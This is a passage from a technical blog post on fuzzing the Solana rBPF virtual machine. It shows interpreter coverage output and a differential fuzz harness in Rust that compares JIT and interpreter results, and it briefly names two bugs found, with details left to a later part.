  850|      2|                    unsafe { *host_ptr = reg[src] as u8 };
  851|       |                },
  852|       |                ebpf::ST_H_REG   => {
  853|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  854|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^3
  855|      3|                    unsafe { *host_ptr = reg[src] as u16 };
  856|       |                },
  857|       |                ebpf::ST_W_REG   => {
  858|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  859|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^2
  860|      2|                    unsafe { *host_ptr = reg[src] as u32 };
  861|       |                },
  862|       |                ebpf::ST_DW_REG  => {
  863|      7|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  864|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^2
  865|      2|                    unsafe { *host_ptr = reg[src] as u64 };
  866|       |                },
  867|       |
  868|       |                // BPF_ALU class
  869|    136|                ebpf::ADD32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_add(insn.imm as i32)   as u64,
  870|     18|                ebpf::ADD32_REG  => reg[dst] = (reg[dst] as i32).wrapping_add(reg[src] as i32)   as u64,
  871|     94|                ebpf::SUB32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_sub(insn.imm as i32)   as u64,
  872|     14|                ebpf::SUB32_REG  => reg[dst] = (reg[dst] as i32).wrapping_sub(reg[src] as i32)   as u64,
  873|    226|                ebpf::MUL32_IMM  => reg[dst] = (reg[dst] as i32).wrapping_mul(insn.imm as i32)   as u64,
  874|     15|                ebpf::MUL32_REG  => reg[dst] = (reg[dst] as i32).wrapping_mul(reg[src] as i32)   as u64,
  875|     98|                ebpf::DIV32_IMM  => reg[dst] = (reg[dst] as u32 / insn.imm as u32)               as u64,
  876|       |                ebpf::DIV32_REG  => {
  877|      4|                    if reg[src] as u32 == 0 {
  878|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  879|      2|                    }
  880|      2|                    reg[dst] = (reg[dst] as u32 / reg[src] as u32) as u64;
  881|       |                },
  882|       |                ebpf::SDIV32_IMM  => {
  883|      0|                    if reg[dst] as i32 == i32::MIN && insn.imm == -1 {
  884|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  885|      0|                    }
  886|      0|                    reg[dst] = (reg[dst] as i32 / insn.imm as i32) as u64;
  887|       |                }
  888|       |                ebpf::SDIV32_REG  => {
  889|      0|                    if reg[src] as i32 == 0 {
  890|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  891|      0|                    }
  892|      0|                    if reg[dst] as i32 == i32::MIN && reg[src] as i32 == -1 {
  893|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  894|      0|                    }
  895|      0|                    reg[dst] = (reg[dst] as i32 / reg[src] as i32) as u64;
  896|       |                },
  897|    102|                ebpf::OR32_IMM   =>   reg[dst] = (reg[dst] as u32             | insn.imm as u32) as u64,
  898|     13|                ebpf::OR32_REG   =>   reg[dst] = (reg[dst] as u32             | reg[src] as u32) as u64,
  899|     46|                ebpf::AND32_IMM  =>   reg[dst] = (reg[dst] as u32             & insn.imm as u32) as u64,
  900|     16|                ebpf::AND32_REG  =>   reg[dst] = (reg[dst] as u32             & reg[src] as u32) as u64,
  901|      4|                ebpf::LSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(insn.imm as u32) as u64,
  902|     32|                ebpf::LSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shl(reg[src] as u32) as u64,
  903|      2|                ebpf::RSH32_IMM  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(insn.imm as u32) as u64,
  904|      4|                ebpf::RSH32_REG  =>   reg[dst] = (reg[dst] as u32).wrapping_shr(reg[src] as u32) as u64,
  905|     54|                ebpf::NEG32      => { reg[dst] = (reg[dst] as i32).wrapping_neg()                as u64; reg[dst] &= u32::MAX as u64; },
  906|     90|                ebpf::MOD32_IMM  =>   reg[dst] = (reg[dst] as u32             % insn.imm as u32) as u64,
  907|       |                ebpf::MOD32_REG  => {
  908|     20|                    if reg[src] as u32 == 0 {
  909|      6|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  910|     14|                    }
  911|     14|                                      reg[dst] = (reg[dst] as u32            % reg[src]  as u32) as u64;
  912|       |                },
  913|     96|                ebpf::XOR32_IMM  =>   reg[dst] = (reg[dst] as u32            ^ insn.imm  as u32) as u64,
  914|     14|                ebpf::XOR32_REG  =>   reg[dst] = (reg[dst] as u32            ^ reg[src]  as u32) as u64,
  915|     59|                ebpf::MOV32_IMM  =>   reg[dst] = insn.imm  as u32                                as u64,
  916|      7|                ebpf::MOV32_REG  =>   reg[dst] = (reg[src] as u32)                               as u64,
  917|     15|                ebpf::ARSH32_IMM => { reg[dst] = (reg[dst] as i32).wrapping_shr(insn.imm as u32) as u64; reg[dst] &= u32::MAX as u64; },
  918|    236|                ebpf::ARSH32_REG => { reg[dst] = (reg[dst] as i32).wrapping_shr(reg[src] as u32) as u64; reg[dst] &= u32::MAX as u64; },
  919|      2|                ebpf::LE         => {
  920|      2|                    reg[dst] = match insn.imm {
  921|      1|                        16 => (reg[dst] as u16).to_le() as u64,
  922|      1|                        32 => (reg[dst] as u32).to_le() as u64,
  923|      0|                        64 =>  reg[dst].to_le(),
  924|       |                        _  => {
  925|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  926|       |                        }
  927|       |                    };
  928|       |                },
  929|      2|                ebpf::BE         => {
  930|      2|                    reg[dst] = match insn.imm {
  931|      1|                        16 => (reg[dst] as u16).to_be() as u64,
  932|      1|                        32 => (reg[dst] as u32).to_be() as u64,
  933|      0|                        64 =>  reg[dst].to_be(),
  934|       |                        _  => {
  935|      0|                            return Err(EbpfError::InvalidInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  936|       |                        }
  937|       |                    };
  938|       |                },
  939|       |
  940|       |                // BPF_ALU64 class
  941|  16.7k|                ebpf::ADD64_IMM  => reg[dst] = reg[dst].wrapping_add(insn.imm as u64),
  942|     26|                ebpf::ADD64_REG  => reg[dst] = reg[dst].wrapping_add(reg[src]),
  943|    145|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|     25|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|    480|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|     13|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|    191|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|      5|                    if reg[src] == 0 {
  950|      3|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|      2|                    }
  952|      2|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|      0|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|      0|                    }
  958|      0|
  959|      0|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|      0|                    if reg[src] == 0 {
  963|      0|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      0|                    }
  965|      0|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      0|                    }
  968|      0|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    115|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|     19|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|     93|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|     19|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|     19|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|     48|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      4|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|      5|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|     94|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|    141|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|     19|                    if reg[src] == 0 {
  982|      4|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|     15|                    }
  984|     15|                                    reg[dst] %= reg[src];
  985|       |                },
  986|     98|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|     17|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|     89|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|     10|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|     14|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    294|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|   327k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|    116|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^76                                                           ^40
  996|   131k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^11
  997|   163k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^16.4k
  998|   131k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^34
  999|  65.5k|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^8
 1000|  65.5k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^11
 1001|  65.5k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^3
 1002|      6|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^4                                                            ^2
 1003|   131k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1004|  65.5k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^2
 1005|      3|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^2
 1006|      2|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|   196k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^196k                                                         ^3
 1008|   131k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^3
 1009|  65.5k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^6
 1010|     14|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1                                                            ^13
 1011|  65.5k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^12
 1012|  65.5k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1013|   131k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^20
 1014|   147k|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^147k                                                         ^23
 1015|  65.5k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^65.5k                                                        ^4
 1016|   131k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^131k                                                         ^2
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     17|                    let mut resolved = false;
 1032|     17|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     17|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     17|                    if syscalls {
 1039|      6|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      6|                        }
 1062|     11|                    }
 1063|       |
 1064|     17|                    if calls {
 1065|     11|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     11|                        }
 1073|      6|                    }
 1074|       |
 1075|     17|                    if !resolved {
 1076|     17|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     11|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     39|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     39|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|  2.16M|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|     33|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|  2.16M|            }
 1106|       |        }
 1107|       |
 1108|    683|        Err(EbpfError::ExecutionOverrun(
 1109|    683|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    683|        ))
 1111|    886|    }

Now we see that jump and call instructions are actually used, and that we execute the content of the interpreter loop significantly more despite having approximately the same amount of successful calls to the interpreter function. From this, we can infer that not only are more programs successfully executed, but also that, of those executed, they tend to have more valid instructions executed overall.

While this isn’t hitting every branch, it’s now hitting significantly more – and with much more interesting values.

The development of this version of the fuzzer took about an hour, so we’re at a total of one hour of development.

JIT and differential fuzzing

Now that we have a fuzzer which can generate lots of inputs that are actually interesting to us, we can develop a fuzzer which can test both JIT and the interpreter against each other. But how do we even test them against each other?

Picking inputs, outputs, and configuration

As the definition of pseudo-oracle says: we need to check if the alternate program (for JIT, the interpreter, and vice versa), when provided with the same “input” provides the same “output”. So what inputs and outputs do we have?

For inputs, there are three notable things we’ll want to vary:

The config which determines how the VM should execute (what features and such)
The BPF program to be executed, which we’ll generate like we do in “smart”
The initial memory of the VMs

Once we’ve developed our inputs, we’ll also need to think of our outputs:

The “return state”, the exit code itself or the error state
The number of instructions executed (e.g., did the JIT program overrun?)
The final memory of the VMs

Then, to execute both JIT and the interpreter, we’ll take the following steps:

The same steps as the first fuzzers:
- Use the rBPF verification pass (called “check”) to make sure that the VM will accept the input program
- Initialise the memory, the syscalls, and the entrypoint
- Create the executable data
Then prepare to perform the differential testing
- JIT compile the BPF code (if it fails, fail quietly)
- Initialise the interpreted VM
- Initialise the JIT VM
- Execute both the interpreted and JIT VMs
- Compare return state, instructions executed, and final memory, and panic if any do not match.

Writing the fuzzer

As before, I’ve split this up into more manageable chunks so you can read them one at a time outside of their context before trying to interpret their final context.

Step 1: Defining our inputs

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    ... snip ...
    prog: FuzzProgram,
    mem: Vec<u8>,
}

Step 2: Setting up the VM

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ... snip ...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        // See step 3
    }
});

Step 3: Executing our input and comparing output

fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![no_main]

use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,
}

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    prog.exit()
        .set_dst(data.exit_dst)
        .set_src(data.exit_src)
        .set_off(data.exit_off)
        .set_imm(data.exit_imm)
        .push();
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Theoretically, an up-to-date version is available in the rBPF repo.

And, with that, we have our fuzzer! This part of the fuzzer took approximately three hours to implement (largely due to finding several issues with the fuzzer and debugging them along the way).

At this point, we were about six hours in. I turned on the fuzzer and waited:

$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1

And the crashes began. Two main bugs appeared:

A panic when there was an error in interpreter, but not JIT, when writing to a particular address (crash in 15 minutes)
A AddressSanitizer crash from a memory leak when an error occurred just after the instruction limit was past by the JIT’d program (crash in two hours)

To read the details of these bugs, continue to Part 2.